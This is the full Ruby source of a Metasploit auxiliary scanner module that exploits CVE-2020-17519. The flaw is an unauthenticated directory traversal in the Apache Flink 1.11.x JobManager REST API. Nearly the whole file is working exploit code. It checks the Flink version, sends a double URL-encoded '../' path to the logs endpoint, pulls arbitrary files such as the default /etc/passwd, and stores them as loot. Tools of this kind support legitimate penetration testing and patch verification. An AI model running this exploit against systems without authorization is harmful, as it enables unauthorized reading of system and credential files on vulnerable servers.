Apache Flink JobManager Traversal

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache Flink JobManager Traversal',
        'Description' => %q{
          This module exploits an unauthenticated directory traversal vulnerability
          in Apache Flink versions 1.11.0 <= 1.11.2. The JobManager REST API fails
          to validate user-supplied log file paths, allowing retrieval of arbitrary
          files with the privileges of the web server user.

          This module has been tested successfully on Apache Flink version 1.11.2
          on Ubuntu 18.04.4.
        },
        'Author' => [
          '0rich1 - Ant Security FG Lab', # Vulnerability discovery
          'Hoa Nguyen - Suncsr Team', # Metasploit module
          'bcoles', # Metasploit module cleanup and improvements
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2020-17519'],
          ['CWE', '22'],
          ['EDB', '49398'],
          ['PACKETSTORM', '160849'],
          ['URL', 'https://www.openwall.com/lists/oss-security/2021/01/05/2'],
          ['URL', 'https://www.tenable.com/cve/CVE-2020-17519']
        ],
        'DefaultOptions' => { 'RPORT' => 8081 },
        'DisclosureDate' => '2021-01-05',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptInt.new('DEPTH', [ true, 'Depth for path traversal', 10]),
      OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd'])
    ])
  end

  def check_host(_ip)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'config')
    })

    unless res
      return Exploit::CheckCode::Unknown('No reply.')
    end

    unless res.body.include?('flink')
      return Exploit::CheckCode::Safe('Target is not Apache Flink.')
    end

    version = res.get_json_document['flink-version']

    if version.blank?
      return Exploit::CheckCode::Detected('Could not determine Apache Flink software version.')
    end

    if Rex::Version.new(version).between?(Rex::Version.new('1.11.0'), Rex::Version.new('1.11.2'))
      return Exploit::CheckCode::Appears("Apache Flink version #{version} appears vulnerable.")
    end

    Exploit::CheckCode::Safe("Apache Flink version #{version} is not vulnerable.")
  end

  def retrieve_file(depth, filepath)
    traversal = Rex::Text.uri_encode(Rex::Text.uri_encode("#{'../' * depth}#{filepath}", 'hex-all'))
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'jobmanager', 'logs', traversal)
    })

    unless res
      print_error('No reply')
      return
    end

    if res.code == 404
      print_error('File not found')
      return
    end

    if res.code == 500
      print_error("Unexpected reply (HTTP #{res.code}): Server encountered an error attempting to read file")
      msg = res.body.scan(/Caused by: (.+?)\\n/).flatten.last
      print_error(msg) if msg
      return
    end

    if res.code != 200
      print_error("Unexpected reply (HTTP #{res.code})")
      return
    end

    res.body.to_s
  end

  def run_host(ip)
    depth = datastore['DEPTH']
    filepath = datastore['FILEPATH']

    print_status("Downloading #{filepath} ...")
    res = retrieve_file(depth, filepath)

    return if res.blank?

    print_good("Downloaded #{filepath} (#{res.length} bytes)")
    path = store_loot(
      'apache.flink.jobmanager.traversal',
      'text/plain',
      ip,
      res,
      File.basename(filepath)
    )
    print_good("File #{filepath} saved in: #{path}")
  end
end